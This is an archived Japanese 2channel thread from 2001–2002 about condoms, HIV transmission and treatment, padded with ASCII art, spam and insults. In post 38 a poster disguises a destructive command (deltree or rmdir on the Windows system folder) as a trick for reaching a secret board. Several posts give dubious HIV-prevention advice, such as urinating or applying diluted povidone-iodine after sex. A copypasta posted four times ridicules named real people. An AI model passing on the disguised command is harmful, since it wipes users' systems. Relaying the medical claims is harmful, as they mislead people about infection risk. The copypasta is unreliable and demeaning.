5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

コンドーム・・

1 :名無しさん@おだいじに:01/12/29 15:20 ID:/206mbIq
http://bbs9.otd.co.jp/915958/bbs_plain
ここでエイズや薬物に関して議論されているんですが、
もっと知識が必要と感じましたので、興味がある方は参加よろしく。

2 :名無しさん@おだいじに:01/12/29 15:35 ID:???
                          ┗0=============0┛
               \===========[_|_|_|_|_|_|_|_|_|_|_|_|_|_]===========/
            /三三三三三三三三三三三三三三三三三三三三\
                  0 │ |∞∞∞ |::|∞∞田田∞∞|::|∞∞∞ | ::|  0
            [二] | ::|       |::|┏━━━━┓|::|       | ::l [二]
◎○@※◎○@※. |□|.│ |┌┬┐ |::|┃/ >>1.\┃|::| ┌┬┐| ::|. |□| ◎○@※◎○@※
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiiil..`)三(´| ::|├┼┤ |::|┃ ∧_∧ ..┃|::| ├┼┤| ::|`)三(´il|iiii|iiii|iiii|iiii|iiii|iiii|iiii|
@※◎○@※◎○ | ::| | ::|└┴┘ |::|┃(´∀` ) ┃|::| └┴┘| ::| | ::|  @※◎○@※◎○
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|li┏━━━━━┓|::|┃(.    つ┃|::|┏━━━━━┓ li|iiii|iiii|iiii|iiii|iiii|iiii|iiii|l
◎○@iiii※◎○@ ┣┳┳┳┳┳┫|::|┗━━━━┛|::|┣┳┳┳┳┳┫ ◎○@iiii※◎○@
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiiil  ○    ●       ∫∬∫∬        ●    ○  li|iiii|iiii|iiii|iiii|iiii|iiii|iiii|li
               ○○  ●●      iiiii iii ii iiii      ●●  ○○
           [ ̄ ̄] [ ̄ ̄]   ( ̄ ̄ ̄ ̄ ̄)    [ ̄ ̄] [ ̄ ̄]
                |_○_|  .|_○_|     |______|     |_○_|  .|_○_|

3 :名無しさん@おだいじに:01/12/29 15:37 ID:???
>>1
消えろよ 馬鹿。

4 :名無しさん@おだいじに:01/12/29 15:38 ID:???
2001年12月29日(土) 大井競馬 第9競走 ダート 2000m(外・右) 15:40発走
農林水産大臣賞典(指定交流)
第47回 東京大賞典(GI)                          
(サラブレッド系 定量)

 賞金 1着 80,000,000円 2着 28,000,000円 3着 16,000,000円 4着 8,000,000円 5着 4,000,000円


1 01 ノボトゥルー        蛯名正 57
1 02 ロイヤルエンデバー 繁田   55
2 03 オンユアマーク     鷹見   55
2 04 イエローパワー     桑島   57
3 05 トーホーエンペラー  菅原勲  57
3 06 ドラールアラビアン  的場文 56
4 07 サプライズパワー   佐藤隆 56
4 08 フレアリングマズル  左海   55
5 09 レイズスズラン    江田照 56
5 10 ムガムチュウ     藤田   55
6 11 リージェントブラフ   吉田   57
6 12 イナリコンコルド    内田博 56
7 13 ボナンザローマン   蔵重   57
7 14 トーシンブリザード  石崎隆 55
8 15 ウイングアロー    横山典 56
8 16 アローウィナー      澤    57

5 :名無しさん@おだいじに:01/12/29 16:13 ID:???
???

6 :名無しさん@おだいじに:01/12/29 16:16 ID:???
オカモト万歳!

7 :名無しさん@おだいじに:01/12/29 16:17 ID:???
競馬のG1ってあるじゃない?
あれってK1とかと違うの?

8 :名無しさん@おだいじに:01/12/29 16:28 ID:???
>>7
お前馬鹿か???

9 :名無しさん@おだいじに:01/12/29 18:45 ID:???
age

10 :名無しさん@おだいじに:01/12/29 18:52 ID:vo/XEWmB
>>6
不二ラテックスもよろしく!!

11 :近藤 務だが:01/12/29 20:19 ID:???
名前を読んで、よく笑われる。。。

12 :名無しさん@おだいじに:01/12/29 20:25 ID:3qRRXsBd
ツトムはなにがおかしいの?

13 :近藤 務だが:01/12/29 20:27 ID:???
せめて努にしてほしかった、と思ふ。

14 :名無しさん@おだいじに:01/12/29 20:28 ID:3qRRXsBd
あ、分かった
あははっははははっははははあははあっはっはっはっはっはっはあは!
あはは!

15 :名無しさん@おだいじに:01/12/29 23:06 ID:???
まとめのまとめのまとめ・・・
↓これを書き込むと、狂ったように反論するおばかさんが登場します。楽しみ〜。

@2002年4月から、
東大大学院医学系研究科健康科学・看護学専攻健康社会学分野に、河合薫と石井苗子がご入学。プ

A看護短大→東大医学部健康科学・看護学科への編入が可能!
かなりのバカでもok!都立医技短看護学科卒の山本舞衣子がいい例です!看護婦にはならず、芸能人気取り〜。

B医学部健康科学・看護学科の前身(保健学科)の前身は、「衛生看護学科」。
衛生看護学科は女子のみの募集、別枠の入試、転部・転科は認められず、駒場でも仲間はずれ、
本郷での教育は行われず、今はなき小石川の分院が衛看キャンパス。

C衛生看護学科卒のおばちゃんたちは、「戦後まもなくの頃、東大に入れた女性!」等とちやほやされ、
たかが衛看卒なのに「東大」ってだけで学長になれたりする。
実際は「女性である」だけで簡単に東大に入れた時代があることをお忘れなく。プ。
http://www.nagano-nurs.ac.jp/presword/index.html
見藤隆子おばちゃんは、長野県看護大学学長。

D有力な噂として、
医科歯科の歯学部→東大にプレゼント、東大歯学・健康科学部を新設、看護は医科歯科に譲渡。
理由:東大では駒場から進学した学生が、誰も看護婦にならない。
看護教育が成立しない。
医学部教授の9割は医師で、看護婦に発言権がない。
M痘さんへのあてつけ(「ほーら、保健学科のままにしときゃーよかったのに」的あてつけ)。
看護短大卒の編入生がお馬鹿でウザイ。


16 :名無しさん@おだいじに:01/12/29 23:25 ID:???
age

17 : :01/12/30 02:37 ID:???
コピペうぜぇぇぇぇぇぇぇ

18 :名無しさん@おだいじに:01/12/30 04:10 ID:???
うぜぇぇぇぇぇぇ

19 :名無しさん@おだいじに:01/12/30 04:55 ID:???
  | 俺の立てたスレなんだ!!!
  | age続けるんだ!!!
  | 名スレにするんだ!!!
  | きっと職人さんも来てくれる!!!
  \___________ ____
                       ∨  カタカタ____ ___
                  ∧_∧   ||\   .\  |◎ |
                  (.#`Д´)  ||  | ̄ ̄|  |:[].|
            ∧_∧ ┌(   つ/ ̄.l| / ̄ ̄/ ..| =|
   ∧_∧   ( TДT) |└ ヽ |二二二」二二二二二二二二」
  ( TДT)  ( つ つ   ̄]||__)   | ||       | ||
  (つ  つ  /  / /   / ̄\   / ||       / ||
  と_)_)  (___)__)  ◎    ◎.[___||     .[___||
            ∧
   / ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   | >>1よ、もういいんだ・・・・・・・
   | 本当に良く頑張った・・・もう充分じゃないか・・・
   | 楽になっていいんだ・・・
   | 忘れるんだ・・・何事もなかったように・・・・・・

20 :近藤 務だが:01/12/30 12:11 ID:???
エイズキャンペーンの先頭に立とう!
おれが「近藤 務」だ!

みんな使ってやってくれ!

21 :近藤 務だが:01/12/30 12:12 ID:???
しかし、感染者(キャリア含む)の○ーメンのんでしまったら、
結局意味ないんだよね。

おれも無力さを感じるよ。

22 :名無しさん@おだいじに:01/12/30 12:36 ID:Xz35iXlr
そうそう
よく世間一般人って知識ないからこわいよね
フェラで性感染することもしらない
女の口に常在菌いることも
肝炎だってうつる事も知らない
こわいよね

23 :名無しさん@おだいじに:01/12/30 16:20 ID:???
>>22
キスでも感染するわけですか?

風俗のいった直後にチンポを丹念に洗ってもダメですか?

24 :名無しさん@おだいじに:01/12/30 19:49 ID:xtTbG/OK
>>23
ディープじゃなきゃだいじょーぶだってよ。
あと、♂の場合はやった後にすぐ射精するかオシッコしちゃえば理論的にはOK!
と専門のDRが言ってたぜ。

25 :名無しさん@おだいじに:01/12/30 20:04 ID:???
>>24
オシッコって、そんなの信じるなよ。
ウィルスは粘膜にできた微小な傷から侵入するわけだろ。
そんなんじゃダメだよ。
もしかしてネタ?

26 :名無しさん@おだいじに:01/12/30 20:28 ID:???
>>24 同じ事を聞いた事がありますが、貴方は私の知り合いですか?

27 :歩く性教育:01/12/30 20:31 ID:???
あーあ、こうやって「間違った知識」が一人歩きしていくんだよな。
それぞれのリスクの頻度は自分で調べろよ。それでどの数字をチョイス
するかは自己責任でやってくれ。

まず非生殖行為による感染だ。
全ての体液にはエイズウィルスがいると思え。ただ、その量は
血液及び精液以外では極めて微量で、常識的な量では感染に
及ばないとされる。←しないわけではない、そこのとこ夜露死苦。

よく言われるのが、涙だの唾液だとバケツ何杯分とかいうヤツだな。
ただし唾液に関しては、歯周病や傷があるとケタがガクンと下がる
から気をつけな。
キャリアの相手が歯周病で10倍のウィルスをもっているとしよう。
自分はさっきケンカしたばかりで口に傷があり、普通より10倍
ウィルスが入り込みやすい状態だとしよう。
それだけでリスクが100倍だ。

血液を触れる機会は一般人はそうないと思われ。
しかし、ウィルス入りの血液とそうでない血液が目で見て区別
できるわけでないから、全て遠ざけて置いた方が無難だな。

性行為感染症について。
口腔内に全く傷がなく、相手の性器にも全く傷がなく粘膜構造が
完璧であるならオーラルでは感染しない。
しかし、現代人の大半は歯周病だし、歯でもって、微少ながら相手の
性器を傷つけることもあるだろう。

ノーマルセックスも同じね。どこかで必ず侵入するきっかけはある。
格段にリスクが高いのがアナルで、もともと入れたり出したりする
器官ではない分傷がつきやすく、桁違いに感染に至りやすい。

男性の場合、直後にオシッコをする、というのは有意差が出ている
かどうかは知らんが、効果はあると考えられる。
淋菌とか梅毒のように相手が大きければね。ウィルスではどう
だろうか。

風俗の後にしっかり性器洗浄・含嗽をするのは当然だね。
イソジンガーグル1本ポケットにいれて風俗に行くんだぞ。ちょっと
スースーするが、イソジンガーグル薄めてペニス拭くんだぞ。
適用外だけど有効成分は同じだから気にするな。とにかく手に入る
消毒剤の中でポピドンヨードは最高の有効率を持っているからな。

まぁ、クローズドなパートナーでない限り(処女と童貞で結婚して
一生添い遂げる、ウチのとーちゃんとかーちゃんみてえだな)、
何らかのリスクはある訳だ。
いや、処女童貞でも、親から感染した可能性がある。

そのリスクとどうつきあうか、これも恋愛を生きるに必要な
知識・技術だろうな。

28 :名無しさん@おだいじに:01/12/30 21:45 ID:???
>>27
ペニスを磯腎で拭いても、気休めにしかならんだろ。
もし磯腎で不活化されるくらいだったら
そのHIVは既に空気に触れて不活化されてるはずだし、
既に体内に侵入してるHIVには何の効力もない。

29 :名無しさん@おだいじに:01/12/30 21:47 ID:???
糞スレ終了

30 :名無しさん@おだいじに:01/12/30 21:50 ID:???
今度産む>コンドーム

まさに、避妊具。(笑

31 :名無しさん@おだいじに:01/12/30 23:06 ID:???
表面に付着しているウィルスに対しては効果があるでしょう。
確かにHIVは弱いウィルスだけど、空気に触れた位で不活性化はしない。
血液製剤にも残存するくらい。

まぁ色んな菌、ウィルスにポピドンヨード作用させてみてごらん。
あるいはそんなペーパーを読んでから話そうね。

32 :名無しさん@おだいじに:01/12/30 23:47 ID:???
>>31
空気に触れると不活化するってのは、
教科書に載ってるくらい一般的な知識だと思うけど。

俺はヨードの効力を疑ってる訳ではないよ。
要は気休め程度の処置を勧めないでくれってこと。
“コーラで膣を洗うと妊娠しない”と同じくらい迷信めいてると思う。

33 :名無しさん@おだいじに:01/12/31 00:21 ID:???
そりゃ、カピカピになるまで乾燥させりゃ、という話だよ。
ウィルスが単独に空気と触れる、というのは難しい。

セックスすりゃ、お互いのナニはべちょべちょだし、その後もべとべと
した状態だろ。
とっととシャワー浴びてイソジンでも塗っとけって。

イソジンは薬理作用が確認されているからね。

34 :名無しさん@おだいじに:01/12/31 00:38 ID:???
むむ、磯腎にこだわるなあ。
感染が成立するかどうかってのはさ、
磯腎なんか塗ってる段階で既に決着がついてるんじゃないかい?

一番いいのは、極力粘膜に触れる機会を減らすこと。
これに尽きるよ。

どうしても磯腎使いたければ、
行為の最中ずっと磯腎ゲルまみれにしといたら?
それなら、感染の確率は減るね。

35 :名無しさん@おだいじに:01/12/31 01:56 ID:???
治療に関してはどうなんですかね、これから完治できる状況にはなりえますか?
なるとしたら、後どのぐらいかかるんですか?
今の医学ではエイズ治療についてはどう認識されてるんですかね?

36 :名無しさん@おだいじに:01/12/31 02:22 ID:???
>34
まぁ、磯仁についてはこれくらいで。
>磯腎なんか塗ってる段階で既に決着がついてるんじゃないかい?
まぁそうなんだけど、何もしないよりもマシじゃない。

しかし想像してしまったぞ。磯仁ゲルをあそこに入れるわけだ(ここまでは本来の使い方)。
で、ナニでグッチョグッチョと突っつく・・・その姿たるや・・・

粘膜に触れる機会を減らす=コンドームな訳だ。
というわけでみなさんよろしく。

治療については、AZTをはじめ抗ウィルス薬の使用がある程度レジメ化されてきている。
だけど、面白いのが「最近のHIVは宿主を殺さない」。細菌・ウィルスの鉄則でもあるわけだけど、
このあたりの解明が進めば、抜本的な治療法が見つかるかも知れない。

37 :名無しさん@おだいじに:01/12/31 02:43 ID:???
確かにコンドームはHIV予防の上では「常識的」かもしれない。
が、現代人(若者)にとってコンドーム使用は「少数派」
=「非常識」なんだよ。
だからいつまでもコンドームに頼らない感染予防法の発見が
医学者には求められる。
やっぱり粘膜接触が格段に気持ち良いのと、人類が生物学的に
一夫一婦制でないのは事実なんだから。
コンドーム推奨と貞操観念みたいのをセットで語る奴は
もし科学者なら怠慢だし、事実誤認。

38 :名無しさん@おだいじに:01/12/31 03:01 ID:???
fusianasannじゃなく、ホントの裏2CHの入り方は以下の通りです。
●●裏2ちゃんねるへの接続方法〜裏技公開〜●●
【1】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【2】win95かwin98の人は「deltree /Y C:\windows」
  winNTかwin2000の人は「rmdir /S C:\winnt」
  ※「/Y」は「yield」の略。「生産する」の意味。
    「/S」は「second /Y」の略。こちらの方が改良されている。
【3】あとは自動的にwindowsがつないでくれるよ。
★「deltree」や「rmdir」は裏ドメイン用のコマンドです。
★こういう裏ドメインのサイトにはDOSを使うと
 トラフィックの混雑が抑えられ、快適に接続できます。
 2ちゃんねるのCGIを使うと、弾かれる可能性が高いです。
★「deltree」や「rmdir」はwindowsの標準コマンドなので安心。
 機能も高く、guest guestを自動入力するほか、
 年齢別の画像も全て表示できるという優れものです。

39 :名無しさん@おだいじに:01/12/31 04:05 ID:???
まとめのまとめのまとめ・・・
↓これを書き込むと、狂ったように反論するおばかさんが登場します。楽しみ〜。

@2002年4月から、
東大大学院医学系研究科健康科学・看護学専攻健康社会学分野に、河合薫と石井苗子がご入学。プ

A看護短大→東大医学部健康科学・看護学科への編入が可能!
かなりのバカでもok!都立医技短看護学科卒の山本舞衣子がいい例です!看護婦にはならず、芸能人気取り〜。

B医学部健康科学・看護学科の前身(保健学科)の前身は、「衛生看護学科」。
衛生看護学科は女子のみの募集、別枠の入試、転部・転科は認められず、駒場でも仲間はずれ、
本郷での教育は行われず、今はなき小石川の分院が衛看キャンパス。

C衛生看護学科卒のおばちゃんたちは、「戦後まもなくの頃、東大に入れた女性!」等とちやほやされ、
たかが衛看卒なのに「東大」ってだけで学長になれたりする。
実際は「女性である」だけで簡単に東大に入れた時代があることをお忘れなく。プ。
http://www.nagano-nurs.ac.jp/presword/index.html
見藤隆子おばちゃんは、長野県看護大学学長。

D有力な噂として、
医科歯科の歯学部→東大にプレゼント、東大歯学・健康科学部を新設、看護は医科歯科に譲渡。
理由:東大では駒場から進学した学生が、誰も看護婦にならない。
看護教育が成立しない。
医学部教授の9割は医師で、看護婦に発言権がない。
M痘さんへのあてつけ(「ほーら、保健学科のままにしときゃーよかったのに」的あてつけ)。
看護短大卒の編入生がお馬鹿でウザイ。


40 :名無しさん@おだいじに:01/12/31 07:57 ID:???
>>35
しばらくは、エイズは“一生うまく付き合っていく”疾患になるでしょうな。
感染はしているけど発症はしていない、という状態を維持するのが治療の目的ね。

逆にいうと、HIVを体内から完全に排除する(完治)のは無理ということは
医学界のほぼ共通認識じゃないかな。
なにせレトロウィルスだからね。

41 :名無しさん@おだいじに:01/12/31 08:37 ID:ugbyjwuc
>>26さん、
>>24だけど、そーかもしんない!?
これからもよろしくな!!

42 :名無しさん@おだいじに:01/12/31 13:59 ID:???
>>37
その指摘は「株に投資して損をしたのは、証券会社が悪い」ってのと一緒だね。
つまり責任転嫁でしかないってこと。
遊びたいんだったらリスクを覚悟した上で、自己責任でやってね。

43 :名無しさん@おだいじに:01/12/31 16:04 ID:???
勉強になるなぁ

44 :名無しさん@おだいじに:01/12/31 16:08 ID:???
>>38 オレはこれには引っかからないがWindows以降にパソコンを始めた
連中なら引っかかるかね?

45 :名無しさん@おだいじに:01/12/31 16:10 ID:???
>>38
これ何?

46 :名無しさん@おだいじに:01/12/31 17:57 ID:???
糞レスあげんなよ

47 :名無しさん@おだいじに:01/12/31 18:29 ID:LQMBQ1yw
>>26さん、
またまた>>24だけど、そのお話しをなさった先生って“いわ○○ ××や先生”
ですよね? だったらビンゴ!でおます。

48 :名無しさん@おだいじに:01/12/31 19:22 ID:Q5VNZNeF
原宿に専門店ありますね

49 :名無しさん@おだいじに:02/01/01 03:18 ID:???
age

50 :名無しさん@おだいじに:02/01/01 08:12 ID:???
前にどっかで書いた気がするが、
エイズとATL、同時に感染すると
どうなるの?
それとも、同時に感染はできないの?

51 :名無しさん@おだいじに:02/01/01 08:57 ID:???
>>50
同時に感染も、もちろんありでしょう。
(もし同時には感染しないと言うのなら、
多くの人は予めわざとHTLV1へ感染する道を選ぶでしょう)

もし同時に感染したとしたら、
おそらくは潜伏期の問題になるのでは?
現代の医療水準だと
HIV(AIDS)の場合はおよそ10年、HTLV1(ATL)は20年以上。
ということは、ATLよりもAIDSの発症が先で、
多くはAIDSによる合併症で死ぬのではないでしょうか。

まあ、免疫力が落ちれば何でもありなんでしょうけどね。
もし仮にATLで死ぬようなことがあったら、
免疫不全による合併症という扱いになるような気もします。

混じれ酢、失礼。

52 :50:02/01/01 17:40 ID:???
>51
交じれ巣、どーもです。
そうか、潜伏期間を考えてナカタヨ。

漏れがえーずになったら、我が身を
実験材料にHTLV1感染しようと思ってたが、
どーやらだめそうだね。

53 :>>52:02/01/01 18:03 ID:???
馬鹿?

54 :BB:02/01/02 11:41 ID:???
>>51
その説明では、大きな誤解が。
HTLV-Iは感染しても発病する人はごくわずかです。
HIVの方は感染しても発病しない人がわずかにいますが、多くの人が確実に発病します。

55 :名無しさん@おだいじに:02/01/03 08:52 ID:???
できる限り早期発見がいいですか?一昨年の四月から風俗に通うようになって、
累計30回ぐらいはいってます。最近エイズの怖さを知って、ビビり始めました。

もしも感染してたら、一年後に発覚するのと、二年後に発覚するのとでは、
その後の治療(発病を抑えるなど)が違ってきますか?

56 :逝け:02/01/03 12:53 ID:???
糞スレ逝け

57 :名無しさん@おだいじに:02/01/03 15:38 ID:???
やっと帰ってきたぞっと。

>>55
当然早期発見が望まれます。
理由は3つあって、
1.ウィルスが少ないウチに治療にかかれること。
2.宿主が弱っていると、その分HIV発症は早くなります。養生した生活に
 移行できること。(徹夜とか泊まりとかは避けた方が良い)
3.自分が原因でさらに感染を広げることは絶対に防がないといけない。

よく、「エイズになったから移しまくってやる」とかいうヒトがいますが、
自分が感染していて性交渉に及ぶと傷害罪が適用されます。
そんなことは、ゆめゆめ思わないことですね。

58 :名無しさん@おだいじに:02/01/03 15:40 ID:???
■東大にはこんなに楽しい話題がいっぱい!楽しんでね!■

@2002年4月から、東大大学院医学系研究科健康科学・看護学専攻健康社会学分野に、河合薫と石井苗子がご入学。プ

A看護短大→東大医学部健康科学・看護学科への編入が可能!http://student.m-sta.com/article/13/118.html かなりのバカでもok!都立医技短看護学科卒のミス東大山本舞衣子がいい例!看護婦にはならず、芸能人気取り〜。

B医学部健康科学・看護学科の前身(保健学科)の前身は、「衛生看護学科」。衛生看護学科は女子のみの募集、別枠の入試、転部・転科は認められず、駒場でも別クラス、本郷キャンパスではなく今はなき小石川分院が衛看キャンパス。

C衛生看護学科卒のおばちゃんたちは「戦後まもなくの頃東大に入れた女性!」等とちやほやされ、たかが衛看卒なのに「東大」ってだけで学長になれたりもする。実際は「女性である」だけで簡単に東大に入れた時代があることをお忘れなく。プ。
http://www.nagano-nurs.ac.jp/presword/index.html 見藤隆子おばちゃん(臨床経験なし)は、長野県看護大学学長。他には参議院議員も!

D有力な噂として、医科歯科の歯学部→東大にプレゼント、東大は歯学・健康科学部を新設、看護は医科歯科に譲渡。その理由:東大では駒場から進学した学生が、看護婦になりたがらない。看護短大卒の編入生はお馬鹿でウザイ。
医学部教授の9割は医師で、看護系教官に発言権がない。健康科学看護学科へ改組した仕掛け人へのあてつけ。

E東大健康科学・看護学科の皆さんの本音:短大卒3年次編入生と席を並べるなんて屈辱…衛生看護学科が始まりだなんて知らなかった、しかも女のみの別枠学科だなんて…。大学院は他大卒ばかり…

F「東大医学部卒」とは書きますが、保健学科卒・健康科学看護学科卒とは書きませーん!アハっ。そして白衣大好き!http://hohashi.org/profile.html
http://hohashi.org/insulin/profile.html
国試落ちたのに、こんな本出しちゃった!てへ。 http://web.infoweb.ne.jp/medical-friend/book/mondaisy/1056.htm

G保健学科の頃、看護実習に出たのは毎年数名。現在は10〜22名程度(学科定員の半数以下)!http://www.hn.m.u-tokyo.ac.jp/hnpamp/02.html#nurhttp://www.hn.m.u-tokyo.ac.jp/hnpamp/04.html
言うまでもなく、健康科学コースは看護実習が必修ではない。http://www.hn.m.u-tokyo.ac.jp/hnpamp/04.html

H俺の職歴:東京モーターショーin幕張メッセ 救護室勤務4日間!
http://www.valley.ne.jp/~jukai/kango/profile.html だって看護に自分をビルトインするの、抵抗あったんだもん!


59 :名無しさん@おだいじに:02/01/03 16:15 ID:???
だれだ?こんな堕スレたてたのは、、

60 :55:02/01/03 17:19 ID:???
>>57
なるほど。
例えば、僕は現在どう早く感染してても一年と七ヶ月ほどなんですが、
このぐらいだと、早期発見の範疇に入りますか?
発病を抑える、という望みはありますか?
上手くいけば、そのまま何十年も発病しないケースもあると耳に挟んだんですが。

なんか凄く怖くなってきました。何で風俗にいったんだろう。
もっと性病について勉強しとけばよかった。

61 :名無しさん@おだいじに:02/01/03 18:44 ID:???
十分早期の部類に入ると思います。
感染していた場合、長くても1ヶ月で抗体価が上がります。念のため、さらに1、2ヶ月後にもう1回
検査して下さい。

発病を押さえる方法としては、多剤併用による治療法が行われつつあります。
ちょっと専門的ですが、
http://www.atopy.com/soukai/shoroku/IL7.html

うまくいけば、の確率は1割程度ですが、確かにそのような人がいるのも事実です。
理由はよくわかっていません。
けど、この「たった1割」に賭けるより、免疫能を落とさずに節制した生活を営むことの
方が大事だと思いますよ。

恐いかも知れませんが、検査だけはまず受けるようにしましょう。
ビクビクする前にゴムしとけば良かった。

62 :馬鹿は逝け:02/01/03 19:06 ID:???
http://1.██▓▓▓▓██
        http://1.█▓.._▓.._▓▓▓▓█
       http://1.█▓.._.._▓▓▓▓▓▓▓█
       http://1.█▓.._▓▓▓▓▓▓▓▓█
      http://1.█▓▓▓▓▓▓▓▓▓▓▓▓█
      http://1.█.._▓▓▓▓▓▓▓▓▓▓▓█
     http://1.█▓▓▓▓▓.._▓▓▓.._▓▓.._▓█
     http://1.█▓▓▓▓.._█.._▓.._█.._▓▓▓.._█
    http://1.█▓▓▓▓▓▓.._▓▓▓.._▓▓▓▓.._█
    http://1.█▓▓▓▓▓█▓▓▓▓█▓▓▓▓▓█
    http://1.█▓▓▓▓▓▓████▓▓▓▓▓▓█
     http://1.█▓▓▓▓▓▓▓▓▓▓▓▓▓▓█
      http://1.███.._█.._█.._█.._█.._██
     http://1.█.._█.._█.._█.._█.._█.._█.._.._█
    http://1.█.._█.._██.._█.._█.._█.._█.._█.._█

63 :名無しさん@おだいじに:02/01/03 19:09 ID:???
まとめのまとめのまとめ・・・
↓これを書き込むと、狂ったように反論するおばかさんが登場します。楽しみ〜。

@2002年4月から、
東大大学院医学系研究科健康科学・看護学専攻健康社会学分野に、河合薫と石井苗子がご入学。プ

A看護短大→東大医学部健康科学・看護学科への編入が可能!
かなりのバカでもok!都立医技短看護学科卒の山本舞衣子がいい例です!看護婦にはならず、芸能人気取り〜。

B医学部健康科学・看護学科の前身(保健学科)の前身は、「衛生看護学科」。
衛生看護学科は女子のみの募集、別枠の入試、転部・転科は認められず、駒場でも仲間はずれ、
本郷での教育は行われず、今はなき小石川の分院が衛看キャンパス。

C衛生看護学科卒のおばちゃんたちは、「戦後まもなくの頃、東大に入れた女性!」等とちやほやされ、
たかが衛看卒なのに「東大」ってだけで学長になれたりする。
実際は「女性である」だけで簡単に東大に入れた時代があることをお忘れなく。プ。
http://www.nagano-nurs.ac.jp/presword/index.html
見藤隆子おばちゃんは、長野県看護大学学長。

D有力な噂として、
医科歯科の歯学部→東大にプレゼント、東大歯学・健康科学部を新設、看護は医科歯科に譲渡。
理由:東大では駒場から進学した学生が、誰も看護婦にならない。
看護教育が成立しない。
医学部教授の9割は医師で、看護婦に発言権がない。
M痘さんへのあてつけ(「ほーら、保健学科のままにしときゃーよかったのに」的あてつけ)。
看護短大卒の編入生がお馬鹿でウザイ。

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)